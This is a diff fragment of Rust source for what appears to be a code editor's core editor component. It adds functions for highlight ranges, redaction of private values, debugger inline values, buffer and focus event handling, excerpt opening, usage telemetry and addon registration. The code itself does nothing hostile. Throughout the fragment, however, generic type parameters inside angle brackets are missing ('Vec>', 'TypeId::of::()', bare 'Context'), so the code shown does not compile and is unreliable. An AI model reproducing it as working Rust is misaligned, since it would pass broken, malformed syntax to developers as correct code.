= cx.theme().colors(); + self.background_highlights_in_range(start..end, &snapshot, theme) + } + + #[cfg(feature = "test-support")] + pub fn search_background_highlights(&mut self, cx: &mut Context) -> Vec> { + let snapshot = self.buffer().read(cx).snapshot(cx); + + let highlights = self + .background_highlights + .get(&TypeId::of::()); + + if let Some((_color, ranges)) = highlights { + ranges + .iter() + .map(|range| range.start.to_point(&snapshot)..range.end.to_point(&snapshot)) + .collect_vec() + } else { + vec![] + } + } + + fn document_highlights_for_position<'a>( + &'a self, + position: Anchor, + buffer: &'a MultiBufferSnapshot, + ) -> impl 'a + Iterator> { + let read_highlights = self + .background_highlights + .get(&TypeId::of::()) + .map(|h| &h.1); + let 
write_highlights = self + .background_highlights + .get(&TypeId::of::()) + .map(|h| &h.1); + let left_position = position.bias_left(buffer); + let right_position = position.bias_right(buffer); + read_highlights + .into_iter() + .chain(write_highlights) + .flat_map(move |ranges| { + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe.end.cmp(&left_position, buffer); + if cmp.is_ge() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + + ranges[start_ix..] + .iter() + .take_while(move |range| range.start.cmp(&right_position, buffer).is_le()) + }) + } + + pub fn has_background_highlights(&self) -> bool { + self.background_highlights + .get(&TypeId::of::()) + .map_or(false, |(_, highlights)| !highlights.is_empty()) + } + + pub fn background_highlights_in_range( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + theme: &ThemeColors, + ) -> Vec<(Range, Hsla)> { + let mut results = Vec::new(); + for (color_fetcher, ranges) in self.background_highlights.values() { + let color = color_fetcher(theme); + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe + .end + .cmp(&search_range.start, &display_snapshot.buffer_snapshot); + if cmp.is_gt() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + for range in &ranges[start_ix..] 
{ + if range + .start + .cmp(&search_range.end, &display_snapshot.buffer_snapshot) + .is_ge() + { + break; + } + + let start = range.start.to_display_point(display_snapshot); + let end = range.end.to_display_point(display_snapshot); + results.push((start..end, color)) + } + } + results + } + + pub fn background_highlight_row_ranges( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + count: usize, + ) -> Vec> { + let mut results = Vec::new(); + let Some((_, ranges)) = self.background_highlights.get(&TypeId::of::()) else { + return vec![]; + }; + + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe + .end + .cmp(&search_range.start, &display_snapshot.buffer_snapshot); + if cmp.is_gt() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + let mut push_region = |start: Option, end: Option| { + if let (Some(start_display), Some(end_display)) = (start, end) { + results.push( + start_display.to_display_point(display_snapshot) + ..=end_display.to_display_point(display_snapshot), + ); + } + }; + let mut start_row: Option = None; + let mut end_row: Option = None; + if ranges.len() > count { + return Vec::new(); + } + for range in &ranges[start_ix..] { + if range + .start + .cmp(&search_range.end, &display_snapshot.buffer_snapshot) + .is_ge() + { + break; + } + let end = range.end.to_point(&display_snapshot.buffer_snapshot); + if let Some(current_row) = &end_row { + if end.row == current_row.row { + continue; + } + } + let start = range.start.to_point(&display_snapshot.buffer_snapshot); + if start_row.is_none() { + assert_eq!(end_row, None); + start_row = Some(start); + end_row = Some(end); + continue; + } + if let Some(current_end) = end_row.as_mut() { + if start.row > current_end.row + 1 { + push_region(start_row, end_row); + start_row = Some(start); + end_row = Some(end); + } else { + // Merge two hunks. 
+ *current_end = end; + } + } else { + unreachable!(); + } + } + // We might still have a hunk that was not rendered (if there was a search hit on the last line) + push_region(start_row, end_row); + results + } + + pub fn gutter_highlights_in_range( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + cx: &App, + ) -> Vec<(Range, Hsla)> { + let mut results = Vec::new(); + for (color_fetcher, ranges) in self.gutter_highlights.values() { + let color = color_fetcher(cx); + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe + .end + .cmp(&search_range.start, &display_snapshot.buffer_snapshot); + if cmp.is_gt() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + for range in &ranges[start_ix..] { + if range + .start + .cmp(&search_range.end, &display_snapshot.buffer_snapshot) + .is_ge() + { + break; + } + + let start = range.start.to_display_point(display_snapshot); + let end = range.end.to_display_point(display_snapshot); + results.push((start..end, color)) + } + } + results + } + + /// Get the text ranges corresponding to the redaction query + pub fn redacted_ranges( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + cx: &App, + ) -> Vec> { + display_snapshot + .buffer_snapshot + .redacted_ranges(search_range, |file| { + if let Some(file) = file { + file.is_private() + && EditorSettings::get( + Some(SettingsLocation { + worktree_id: file.worktree_id(cx), + path: file.path().as_ref(), + }), + cx, + ) + .redact_private_values + } else { + false + } + }) + .map(|range| { + range.start.to_display_point(display_snapshot) + ..range.end.to_display_point(display_snapshot) + }) + .collect() + } + + pub fn highlight_text( + &mut self, + ranges: Vec>, + style: HighlightStyle, + cx: &mut Context, + ) { + self.display_map.update(cx, |map, _| { + map.highlight_text(TypeId::of::(), ranges, style) + }); + cx.notify(); + } + + pub(crate) fn highlight_inlays( + &mut self, + highlights: 
Vec, + style: HighlightStyle, + cx: &mut Context, + ) { + self.display_map.update(cx, |map, _| { + map.highlight_inlays(TypeId::of::(), highlights, style) + }); + cx.notify(); + } + + pub fn text_highlights<'a, T: 'static>( + &'a self, + cx: &'a App, + ) -> Option<(HighlightStyle, &'a [Range])> { + self.display_map.read(cx).text_highlights(TypeId::of::()) + } + + pub fn clear_highlights(&mut self, cx: &mut Context) { + let cleared = self + .display_map + .update(cx, |map, _| map.clear_highlights(TypeId::of::())); + if cleared { + cx.notify(); + } + } + + pub fn show_local_cursors(&self, window: &mut Window, cx: &mut App) -> bool { + (self.read_only(cx) || self.blink_manager.read(cx).visible()) + && self.focus_handle.is_focused(window) + } + + pub fn set_show_cursor_when_unfocused(&mut self, is_enabled: bool, cx: &mut Context) { + self.show_cursor_when_unfocused = is_enabled; + cx.notify(); + } + + fn on_buffer_changed(&mut self, _: Entity, cx: &mut Context) { + cx.notify(); + } + + fn on_debug_session_event( + &mut self, + _session: Entity, + event: &SessionEvent, + cx: &mut Context, + ) { + match event { + SessionEvent::InvalidateInlineValue => { + self.refresh_inline_values(cx); + } + _ => {} + } + } + + fn refresh_inline_values(&mut self, cx: &mut Context) { + let Some(project) = self.project.clone() else { + return; + }; + let Some(buffer) = self.buffer.read(cx).as_singleton() else { + return; + }; + if !self.inline_value_cache.enabled { + let inlays = std::mem::take(&mut self.inline_value_cache.inlays); + self.splice_inlays(&inlays, Vec::new(), cx); + return; + } + + let current_execution_position = self + .highlighted_rows + .get(&TypeId::of::()) + .and_then(|lines| lines.last().map(|line| line.range.start)); + + self.inline_value_cache.refresh_task = cx.spawn(async move |editor, cx| { + let snapshot = editor + .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) + .ok()?; + + let inline_values = editor + .update(cx, |_, cx| { + let 
Some(current_execution_position) = current_execution_position else { + return Some(Task::ready(Ok(Vec::new()))); + }; + + // todo(debugger) when introducing multi buffer inline values check execution position's buffer id to make sure the text + // anchor is in the same buffer + let range = + buffer.read(cx).anchor_before(0)..current_execution_position.text_anchor; + project.inline_values(buffer, range, cx) + }) + .ok() + .flatten()? + .await + .context("refreshing debugger inlays") + .log_err()?; + + let (excerpt_id, buffer_id) = snapshot + .excerpts() + .next() + .map(|excerpt| (excerpt.0, excerpt.1.remote_id()))?; + editor + .update(cx, |editor, cx| { + let new_inlays = inline_values + .into_iter() + .map(|debugger_value| { + Inlay::debugger_hint( + post_inc(&mut editor.next_inlay_id), + Anchor::in_buffer(excerpt_id, buffer_id, debugger_value.position), + debugger_value.text(), + ) + }) + .collect::>(); + let mut inlay_ids = new_inlays.iter().map(|inlay| inlay.id).collect(); + std::mem::swap(&mut editor.inline_value_cache.inlays, &mut inlay_ids); + + editor.splice_inlays(&inlay_ids, new_inlays, cx); + }) + .ok()?; + Some(()) + }); + } + + fn on_buffer_event( + &mut self, + multibuffer: &Entity, + event: &multi_buffer::Event, + window: &mut Window, + cx: &mut Context, + ) { + match event { + multi_buffer::Event::Edited { + singleton_buffer_edited, + edited_buffer: buffer_edited, + } => { + self.scrollbar_marker_state.dirty = true; + self.active_indent_guides_state.dirty = true; + self.refresh_active_diagnostics(cx); + self.refresh_code_actions(window, cx); + self.refresh_selected_text_highlights(true, window, cx); + refresh_matching_bracket_highlights(self, window, cx); + if self.has_active_inline_completion() { + self.update_visible_inline_completion(window, cx); + } + if let Some(buffer) = buffer_edited { + let buffer_id = buffer.read(cx).remote_id(); + if !self.registered_buffers.contains_key(&buffer_id) { + if let Some(project) = self.project.as_ref() { + 
project.update(cx, |project, cx| { + self.registered_buffers.insert( + buffer_id, + project.register_buffer_with_language_servers(&buffer, cx), + ); + }) + } + } + } + cx.emit(EditorEvent::BufferEdited); + cx.emit(SearchEvent::MatchesInvalidated); + if *singleton_buffer_edited { + if let Some(project) = &self.project { + #[allow(clippy::mutable_key_type)] + let languages_affected = multibuffer.update(cx, |multibuffer, cx| { + multibuffer + .all_buffers() + .into_iter() + .filter_map(|buffer| { + buffer.update(cx, |buffer, cx| { + let language = buffer.language()?; + let should_discard = project.update(cx, |project, cx| { + project.is_local() + && !project.has_language_servers_for(buffer, cx) + }); + should_discard.not().then_some(language.clone()) + }) + }) + .collect::>() + }); + if !languages_affected.is_empty() { + self.refresh_inlay_hints( + InlayHintRefreshReason::BufferEdited(languages_affected), + cx, + ); + } + } + } + + let Some(project) = &self.project else { return }; + let (telemetry, is_via_ssh) = { + let project = project.read(cx); + let telemetry = project.client().telemetry().clone(); + let is_via_ssh = project.is_via_ssh(); + (telemetry, is_via_ssh) + }; + refresh_linked_ranges(self, window, cx); + telemetry.log_edit_event("editor", is_via_ssh); + } + multi_buffer::Event::ExcerptsAdded { + buffer, + predecessor, + excerpts, + } => { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + let buffer_id = buffer.read(cx).remote_id(); + if self.buffer.read(cx).diff_for(buffer_id).is_none() { + if let Some(project) = &self.project { + get_uncommitted_diff_for_buffer( + project, + [buffer.clone()], + self.buffer.clone(), + cx, + ) + .detach(); + } + } + cx.emit(EditorEvent::ExcerptsAdded { + buffer: buffer.clone(), + predecessor: *predecessor, + excerpts: excerpts.clone(), + }); + self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); + } + multi_buffer::Event::ExcerptsRemoved { + ids, + removed_buffer_ids, + } => { + 
self.refresh_inlay_hints(InlayHintRefreshReason::ExcerptsRemoved(ids.clone()), cx); + let buffer = self.buffer.read(cx); + self.registered_buffers + .retain(|buffer_id, _| buffer.buffer(*buffer_id).is_some()); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); + cx.emit(EditorEvent::ExcerptsRemoved { + ids: ids.clone(), + removed_buffer_ids: removed_buffer_ids.clone(), + }) + } + multi_buffer::Event::ExcerptsEdited { + excerpt_ids, + buffer_ids, + } => { + self.display_map.update(cx, |map, cx| { + map.unfold_buffers(buffer_ids.iter().copied(), cx) + }); + cx.emit(EditorEvent::ExcerptsEdited { + ids: excerpt_ids.clone(), + }) + } + multi_buffer::Event::ExcerptsExpanded { ids } => { + self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); + cx.emit(EditorEvent::ExcerptsExpanded { ids: ids.clone() }) + } + multi_buffer::Event::Reparsed(buffer_id) => { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); + + cx.emit(EditorEvent::Reparsed(*buffer_id)); + } + multi_buffer::Event::DiffHunksToggled => { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + } + multi_buffer::Event::LanguageChanged(buffer_id) => { + linked_editing_ranges::refresh_linked_ranges(self, window, cx); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); + cx.emit(EditorEvent::Reparsed(*buffer_id)); + cx.notify(); + } + multi_buffer::Event::DirtyChanged => cx.emit(EditorEvent::DirtyChanged), + multi_buffer::Event::Saved => cx.emit(EditorEvent::Saved), + multi_buffer::Event::FileHandleChanged + | multi_buffer::Event::Reloaded + | multi_buffer::Event::BufferDiffChanged => cx.emit(EditorEvent::TitleChanged), + multi_buffer::Event::Closed => cx.emit(EditorEvent::Closed), + multi_buffer::Event::DiagnosticsUpdated => { + self.refresh_active_diagnostics(cx); + self.refresh_inline_diagnostics(true, window, cx); + 
self.scrollbar_marker_state.dirty = true; + cx.notify(); + } + _ => {} + }; + } + + fn on_display_map_changed( + &mut self, + _: Entity, + _: &mut Window, + cx: &mut Context, + ) { + cx.notify(); + } + + fn settings_changed(&mut self, window: &mut Window, cx: &mut Context) { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + self.update_edit_prediction_settings(cx); + self.refresh_inline_completion(true, false, window, cx); + self.refresh_inlay_hints( + InlayHintRefreshReason::SettingsChange(inlay_hint_settings( + self.selections.newest_anchor().head(), + &self.buffer.read(cx).snapshot(cx), + cx, + )), + cx, + ); + + let old_cursor_shape = self.cursor_shape; + + { + let editor_settings = EditorSettings::get_global(cx); + self.scroll_manager.vertical_scroll_margin = editor_settings.vertical_scroll_margin; + self.show_breadcrumbs = editor_settings.toolbar.breadcrumbs; + self.cursor_shape = editor_settings.cursor_shape.unwrap_or_default(); + self.hide_mouse_mode = editor_settings.hide_mouse.unwrap_or_default(); + } + + if old_cursor_shape != self.cursor_shape { + cx.emit(EditorEvent::CursorShapeChanged); + } + + let project_settings = ProjectSettings::get_global(cx); + self.serialize_dirty_buffers = project_settings.session.restore_unsaved_buffers; + + if self.mode.is_full() { + let show_inline_diagnostics = project_settings.diagnostics.inline.enabled; + let inline_blame_enabled = project_settings.git.inline_blame_enabled(); + if self.show_inline_diagnostics != show_inline_diagnostics { + self.show_inline_diagnostics = show_inline_diagnostics; + self.refresh_inline_diagnostics(false, window, cx); + } + + if self.git_blame_inline_enabled != inline_blame_enabled { + self.toggle_git_blame_inline_internal(false, window, cx); + } + } + + cx.notify(); + } + + pub fn set_searchable(&mut self, searchable: bool) { + self.searchable = searchable; + } + + pub fn searchable(&self) -> bool { + self.searchable + } + + fn open_proposed_changes_editor( + &mut 
self, + _: &OpenProposedChangesEditor, + window: &mut Window, + cx: &mut Context, + ) { + let Some(workspace) = self.workspace() else { + cx.propagate(); + return; + }; + + let selections = self.selections.all::(cx); + let multi_buffer = self.buffer.read(cx); + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let mut new_selections_by_buffer = HashMap::default(); + for selection in selections { + for (buffer, range, _) in + multi_buffer_snapshot.range_to_buffer_ranges(selection.start..selection.end) + { + let mut range = range.to_point(buffer); + range.start.column = 0; + range.end.column = buffer.line_len(range.end.row); + new_selections_by_buffer + .entry(multi_buffer.buffer(buffer.remote_id()).unwrap()) + .or_insert(Vec::new()) + .push(range) + } + } + + let proposed_changes_buffers = new_selections_by_buffer + .into_iter() + .map(|(buffer, ranges)| ProposedChangeLocation { buffer, ranges }) + .collect::>(); + let proposed_changes_editor = cx.new(|cx| { + ProposedChangesEditor::new( + "Proposed changes", + proposed_changes_buffers, + self.project.clone(), + window, + cx, + ) + }); + + window.defer(cx, move |window, cx| { + workspace.update(cx, |workspace, cx| { + workspace.active_pane().update(cx, |pane, cx| { + pane.add_item( + Box::new(proposed_changes_editor), + true, + true, + None, + window, + cx, + ); + }); + }); + }); + } + + pub fn open_excerpts_in_split( + &mut self, + _: &OpenExcerptsSplit, + window: &mut Window, + cx: &mut Context, + ) { + self.open_excerpts_common(None, true, window, cx) + } + + pub fn open_excerpts(&mut self, _: &OpenExcerpts, window: &mut Window, cx: &mut Context) { + self.open_excerpts_common(None, false, window, cx) + } + + fn open_excerpts_common( + &mut self, + jump_data: Option, + split: bool, + window: &mut Window, + cx: &mut Context, + ) { + let Some(workspace) = self.workspace() else { + cx.propagate(); + return; + }; + + if self.buffer.read(cx).is_singleton() { + cx.propagate(); + return; + } + + let mut 
new_selections_by_buffer = HashMap::default(); + match &jump_data { + Some(JumpData::MultiBufferPoint { + excerpt_id, + position, + anchor, + line_offset_from_top, + }) => { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + if let Some(buffer) = multi_buffer_snapshot + .buffer_id_for_excerpt(*excerpt_id) + .and_then(|buffer_id| self.buffer.read(cx).buffer(buffer_id)) + { + let buffer_snapshot = buffer.read(cx).snapshot(); + let jump_to_point = if buffer_snapshot.can_resolve(anchor) { + language::ToPoint::to_point(anchor, &buffer_snapshot) + } else { + buffer_snapshot.clip_point(*position, Bias::Left) + }; + let jump_to_offset = buffer_snapshot.point_to_offset(jump_to_point); + new_selections_by_buffer.insert( + buffer, + ( + vec![jump_to_offset..jump_to_offset], + Some(*line_offset_from_top), + ), + ); + } + } + Some(JumpData::MultiBufferRow { + row, + line_offset_from_top, + }) => { + let point = MultiBufferPoint::new(row.0, 0); + if let Some((buffer, buffer_point, _)) = + self.buffer.read(cx).point_to_buffer_point(point, cx) + { + let buffer_offset = buffer.read(cx).point_to_offset(buffer_point); + new_selections_by_buffer + .entry(buffer) + .or_insert((Vec::new(), Some(*line_offset_from_top))) + .0 + .push(buffer_offset..buffer_offset) + } + } + None => { + let selections = self.selections.all::(cx); + let multi_buffer = self.buffer.read(cx); + for selection in selections { + for (snapshot, range, _, anchor) in multi_buffer + .snapshot(cx) + .range_to_buffer_ranges_with_deleted_hunks(selection.range()) + { + if let Some(anchor) = anchor { + // selection is in a deleted hunk + let Some(buffer_id) = anchor.buffer_id else { + continue; + }; + let Some(buffer_handle) = multi_buffer.buffer(buffer_id) else { + continue; + }; + let offset = text::ToOffset::to_offset( + &anchor.text_anchor, + &buffer_handle.read(cx).snapshot(), + ); + let range = offset..offset; + new_selections_by_buffer + .entry(buffer_handle) + .or_insert((Vec::new(), None)) + .0 + 
.push(range) + } else { + let Some(buffer_handle) = multi_buffer.buffer(snapshot.remote_id()) + else { + continue; + }; + new_selections_by_buffer + .entry(buffer_handle) + .or_insert((Vec::new(), None)) + .0 + .push(range) + } + } + } + } + } + + new_selections_by_buffer + .retain(|buffer, _| Self::can_open_excerpts_in_file(buffer.read(cx).file())); + + if new_selections_by_buffer.is_empty() { + return; + } + + // We defer the pane interaction because we ourselves are a workspace item + // and activating a new item causes the pane to call a method on us reentrantly, + // which panics if we're on the stack. + window.defer(cx, move |window, cx| { + workspace.update(cx, |workspace, cx| { + let pane = if split { + workspace.adjacent_pane(window, cx) + } else { + workspace.active_pane().clone() + }; + + for (buffer, (ranges, scroll_offset)) in new_selections_by_buffer { + let editor = buffer + .read(cx) + .file() + .is_none() + .then(|| { + // Handle file-less buffers separately: those are not really the project items, so won't have a project path or entity id, + // so `workspace.open_project_item` will never find them, always opening a new editor. + // Instead, we try to activate the existing editor in the pane first. 
+ let (editor, pane_item_index) = + pane.read(cx).items().enumerate().find_map(|(i, item)| { + let editor = item.downcast::()?; + let singleton_buffer = + editor.read(cx).buffer().read(cx).as_singleton()?; + if singleton_buffer == buffer { + Some((editor, i)) + } else { + None + } + })?; + pane.update(cx, |pane, cx| { + pane.activate_item(pane_item_index, true, true, window, cx) + }); + Some(editor) + }) + .flatten() + .unwrap_or_else(|| { + workspace.open_project_item::( + pane.clone(), + buffer, + true, + true, + window, + cx, + ) + }); + + editor.update(cx, |editor, cx| { + let autoscroll = match scroll_offset { + Some(scroll_offset) => Autoscroll::top_relative(scroll_offset as usize), + None => Autoscroll::newest(), + }; + let nav_history = editor.nav_history.take(); + editor.change_selections(Some(autoscroll), window, cx, |s| { + s.select_ranges(ranges); + }); + editor.nav_history = nav_history; + }); + } + }) + }); + } + + // For now, don't allow opening excerpts in buffers that aren't backed by + // regular project files. 
+ fn can_open_excerpts_in_file(file: Option<&Arc>) -> bool { + file.map_or(true, |file| project::File::from_dyn(Some(file)).is_some()) + } + + fn marked_text_ranges(&self, cx: &App) -> Option>> { + let snapshot = self.buffer.read(cx).read(cx); + let (_, ranges) = self.text_highlights::(cx)?; + Some( + ranges + .iter() + .map(move |range| { + range.start.to_offset_utf16(&snapshot)..range.end.to_offset_utf16(&snapshot) + }) + .collect(), + ) + } + + fn selection_replacement_ranges( + &self, + range: Range, + cx: &mut App, + ) -> Vec> { + let selections = self.selections.all::(cx); + let newest_selection = selections + .iter() + .max_by_key(|selection| selection.id) + .unwrap(); + let start_delta = range.start.0 as isize - newest_selection.start.0 as isize; + let end_delta = range.end.0 as isize - newest_selection.end.0 as isize; + let snapshot = self.buffer.read(cx).read(cx); + selections + .into_iter() + .map(|mut selection| { + selection.start.0 = + (selection.start.0 as isize).saturating_add(start_delta) as usize; + selection.end.0 = (selection.end.0 as isize).saturating_add(end_delta) as usize; + snapshot.clip_offset_utf16(selection.start, Bias::Left) + ..snapshot.clip_offset_utf16(selection.end, Bias::Right) + }) + .collect() + } + + fn report_editor_event( + &self, + event_type: &'static str, + file_extension: Option, + cx: &App, + ) { + if cfg!(any(test, feature = "test-support")) { + return; + } + + let Some(project) = &self.project else { return }; + + // If None, we are in a file without an extension + let file = self + .buffer + .read(cx) + .as_singleton() + .and_then(|b| b.read(cx).file()); + let file_extension = file_extension.or(file + .as_ref() + .and_then(|file| Path::new(file.file_name(cx)).extension()) + .and_then(|e| e.to_str()) + .map(|a| a.to_string())); + + let vim_mode = vim_enabled(cx); + + let edit_predictions_provider = all_language_settings(file, cx).edit_predictions.provider; + let copilot_enabled = edit_predictions_provider + == 
language::language_settings::EditPredictionProvider::Copilot; + let copilot_enabled_for_language = self + .buffer + .read(cx) + .language_settings(cx) + .show_edit_predictions; + + let project = project.read(cx); + telemetry::event!( + event_type, + file_extension, + vim_mode, + copilot_enabled, + copilot_enabled_for_language, + edit_predictions_provider, + is_via_ssh = project.is_via_ssh(), + ); + } + + /// Copy the highlighted chunks to the clipboard as JSON. The format is an array of lines, + /// with each line being an array of {text, highlight} objects. + fn copy_highlight_json( + &mut self, + _: &CopyHighlightJson, + window: &mut Window, + cx: &mut Context, + ) { + #[derive(Serialize)] + struct Chunk<'a> { + text: String, + highlight: Option<&'a str>, + } + + let snapshot = self.buffer.read(cx).snapshot(cx); + let range = self + .selected_text_range(false, window, cx) + .and_then(|selection| { + if selection.range.is_empty() { + None + } else { + Some(selection.range) + } + }) + .unwrap_or_else(|| 0..snapshot.len()); + + let chunks = snapshot.chunks(range, true); + let mut lines = Vec::new(); + let mut line: VecDeque = VecDeque::new(); + + let Some(style) = self.style.as_ref() else { + return; + }; + + for chunk in chunks { + let highlight = chunk + .syntax_highlight_id + .and_then(|id| id.name(&style.syntax)); + let mut chunk_lines = chunk.text.split('\n').peekable(); + while let Some(text) = chunk_lines.next() { + let mut merged_with_last_token = false; + if let Some(last_token) = line.back_mut() { + if last_token.highlight == highlight { + last_token.text.push_str(text); + merged_with_last_token = true; + } + } + + if !merged_with_last_token { + line.push_back(Chunk { + text: text.into(), + highlight, + }); + } + + if chunk_lines.peek().is_some() { + if line.len() > 1 && line.front().unwrap().text.is_empty() { + line.pop_front(); + } + if line.len() > 1 && line.back().unwrap().text.is_empty() { + line.pop_back(); + } + + lines.push(mem::take(&mut line)); + 
} + } + } + + let Some(lines) = serde_json::to_string_pretty(&lines).log_err() else { + return; + }; + cx.write_to_clipboard(ClipboardItem::new_string(lines)); + } + + pub fn open_context_menu( + &mut self, + _: &OpenContextMenu, + window: &mut Window, + cx: &mut Context, + ) { + self.request_autoscroll(Autoscroll::newest(), cx); + let position = self.selections.newest_display(cx).start; + mouse_context_menu::deploy_context_menu(self, None, position, window, cx); + } + + pub fn inlay_hint_cache(&self) -> &InlayHintCache { + &self.inlay_hint_cache + } + + pub fn replay_insert_event( + &mut self, + text: &str, + relative_utf16_range: Option>, + window: &mut Window, + cx: &mut Context, + ) { + if !self.input_enabled { + cx.emit(EditorEvent::InputIgnored { text: text.into() }); + return; + } + if let Some(relative_utf16_range) = relative_utf16_range { + let selections = self.selections.all::(cx); + self.change_selections(None, window, cx, |s| { + let new_ranges = selections.into_iter().map(|range| { + let start = OffsetUtf16( + range + .head() + .0 + .saturating_add_signed(relative_utf16_range.start), + ); + let end = OffsetUtf16( + range + .head() + .0 + .saturating_add_signed(relative_utf16_range.end), + ); + start..end + }); + s.select_ranges(new_ranges); + }); + } + + self.handle_input(text, window, cx); + } + + pub fn supports_inlay_hints(&self, cx: &mut App) -> bool { + let Some(provider) = self.semantics_provider.as_ref() else { + return false; + }; + + let mut supports = false; + self.buffer().update(cx, |this, cx| { + this.for_each_buffer(|buffer| { + supports |= provider.supports_inlay_hints(buffer, cx); + }); + }); + + supports + } + + pub fn is_focused(&self, window: &Window) -> bool { + self.focus_handle.is_focused(window) + } + + fn handle_focus(&mut self, window: &mut Window, cx: &mut Context) { + cx.emit(EditorEvent::Focused); + + if let Some(descendant) = self + .last_focused_descendant + .take() + .and_then(|descendant| descendant.upgrade()) + { + 
window.focus(&descendant); + } else { + if let Some(blame) = self.blame.as_ref() { + blame.update(cx, GitBlame::focus) + } + + self.blink_manager.update(cx, |blink_manager, cx| { + blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { + buffer.finalize_last_transaction(cx); + if self.leader_peer_id.is_none() { + buffer.set_active_selections( + &self.selections.disjoint_anchors(), + self.selections.line_mode, + self.cursor_shape, + cx, + ); + } + }); + } + } + + fn handle_focus_in(&mut self, _: &mut Window, cx: &mut Context) { + cx.emit(EditorEvent::FocusedIn) + } + + fn handle_focus_out( + &mut self, + event: FocusOutEvent, + _window: &mut Window, + cx: &mut Context, + ) { + if event.blurred != self.focus_handle { + self.last_focused_descendant = Some(event.blurred); + } + self.refresh_inlay_hints(InlayHintRefreshReason::ModifiersChanged(false), cx); + } + + pub fn handle_blur(&mut self, window: &mut Window, cx: &mut Context) { + self.blink_manager.update(cx, BlinkManager::disable); + self.buffer + .update(cx, |buffer, cx| buffer.remove_active_selections(cx)); + + if let Some(blame) = self.blame.as_ref() { + blame.update(cx, GitBlame::blur) + } + if !self.hover_state.focused(window, cx) { + hide_hover(self, cx); + } + if !self + .context_menu + .borrow() + .as_ref() + .is_some_and(|context_menu| context_menu.focused(window, cx)) + { + self.hide_context_menu(window, cx); + } + self.discard_inline_completion(false, cx); + cx.emit(EditorEvent::Blurred); + cx.notify(); + } + + pub fn register_action( + &mut self, + listener: impl Fn(&A, &mut Window, &mut App) + 'static, + ) -> Subscription { + let id = self.next_editor_action_id.post_inc(); + let listener = Arc::new(listener); + self.editor_actions.borrow_mut().insert( + id, + Box::new(move |window, _| { + let listener = listener.clone(); + window.on_action(TypeId::of::(), move |action, phase, window, cx| { + let action = action.downcast_ref().unwrap(); + if phase 
== DispatchPhase::Bubble { + listener(action, window, cx) + } + }) + }), + ); + + let editor_actions = self.editor_actions.clone(); + Subscription::new(move || { + editor_actions.borrow_mut().remove(&id); + }) + } + + pub fn file_header_size(&self) -> u32 { + FILE_HEADER_HEIGHT + } + + pub fn restore( + &mut self, + revert_changes: HashMap, Rope)>>, + window: &mut Window, + cx: &mut Context, + ) { + let workspace = self.workspace(); + let project = self.project.as_ref(); + let save_tasks = self.buffer().update(cx, |multi_buffer, cx| { + let mut tasks = Vec::new(); + for (buffer_id, changes) in revert_changes { + if let Some(buffer) = multi_buffer.buffer(buffer_id) { + buffer.update(cx, |buffer, cx| { + buffer.edit( + changes + .into_iter() + .map(|(range, text)| (range, text.to_string())), + None, + cx, + ); + }); + + if let Some(project) = + project.filter(|_| multi_buffer.all_diff_hunks_expanded()) + { + project.update(cx, |project, cx| { + tasks.push((buffer.clone(), project.save_buffer(buffer, cx))); + }) + } + } + } + tasks + }); + cx.spawn_in(window, async move |_, cx| { + for (buffer, task) in save_tasks { + let result = task.await; + if result.is_err() { + let Some(path) = buffer + .read_with(cx, |buffer, cx| buffer.project_path(cx)) + .ok() + else { + continue; + }; + if let Some((workspace, path)) = workspace.as_ref().zip(path) { + let Some(task) = cx + .update_window_entity(&workspace, |workspace, window, cx| { + workspace + .open_path_preview(path, None, false, false, false, window, cx) + }) + .ok() + else { + continue; + }; + task.await.log_err(); + } + } + } + }) + .detach(); + self.change_selections(None, window, cx, |selections| selections.refresh()); + } + + pub fn to_pixel_point( + &self, + source: multi_buffer::Anchor, + editor_snapshot: &EditorSnapshot, + window: &mut Window, + ) -> Option> { + let source_point = source.to_display_point(editor_snapshot); + self.display_to_pixel_point(source_point, editor_snapshot, window) + } + + pub fn 
display_to_pixel_point( + &self, + source: DisplayPoint, + editor_snapshot: &EditorSnapshot, + window: &mut Window, + ) -> Option> { + let line_height = self.style()?.text.line_height_in_pixels(window.rem_size()); + let text_layout_details = self.text_layout_details(window); + let scroll_top = text_layout_details + .scroll_anchor + .scroll_position(editor_snapshot) + .y; + + if source.row().as_f32() < scroll_top.floor() { + return None; + } + let source_x = editor_snapshot.x_for_display_point(source, &text_layout_details); + let source_y = line_height * (source.row().as_f32() - scroll_top); + Some(gpui::Point::new(source_x, source_y)) + } + + pub fn has_visible_completions_menu(&self) -> bool { + !self.edit_prediction_preview_is_active() + && self.context_menu.borrow().as_ref().map_or(false, |menu| { + menu.visible() && matches!(menu, CodeContextMenu::Completions(_)) + }) + } + + pub fn register_addon(&mut self, instance: T) { + self.addons + .insert(std::any::TypeId::of::(), Box::new(instance)); + } + + pub fn unregister_addon(&mut self) { + self.addons.remove(&std::any::TypeId::of::()); + } + + pub fn addon(&self) -> Option<&T> { + let type_id = std::any::TypeId::of::(); + self.addons + .get(&type_id) + .and_then(|item| item.to_any().downcast_ref::()) + } + + pub fn addon_mut(&mut self) -> Option<&mut T> { 